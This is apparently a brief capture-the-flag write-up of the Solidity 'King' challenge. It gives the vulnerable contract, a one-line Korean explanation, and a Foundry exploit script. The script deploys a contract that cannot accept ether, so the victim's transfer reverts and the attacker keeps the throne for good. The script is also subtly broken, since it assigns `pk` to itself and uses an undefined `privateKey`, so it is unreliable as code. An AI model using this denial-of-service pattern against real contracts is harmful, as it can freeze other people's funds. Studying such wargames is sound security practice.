Prob
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
contract King {
address king;
uint256 public prize;
address public owner;
constructor() payable {
owner = msg.sender;
king = msg.sender;
prize = msg.value;
}
receive() external payable {
require(msg.value >= prize || msg.sender == owner);
payable(king).transfer(msg.value);
king = msg.sender;
prize = msg.value;
}
function _king() public view returns (address) {
return king;
}
}PoC
돈을 받지 못해 transfer 함수 호출이 거부되므로 king을 계속 유지할 수 있습니다.
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import {Script, console} from "forge-std/Script.sol";
interface IKing {
function prize() external view returns (uint256);
}
contract attack {
constructor(address payable target) payable {
target.call{value: msg.value}("");
}
}
contract exploit is Script {
function run() public {
uint256 pk = pk;
address addr = 0x612fE2418bB97C220Cc8F63Cc95E3261d4664CD9;
vm.startBroadcast(privateKey);
new attack{value: 0.0010001 ether}(payable(addr));
vm.stopBroadcast();
}
}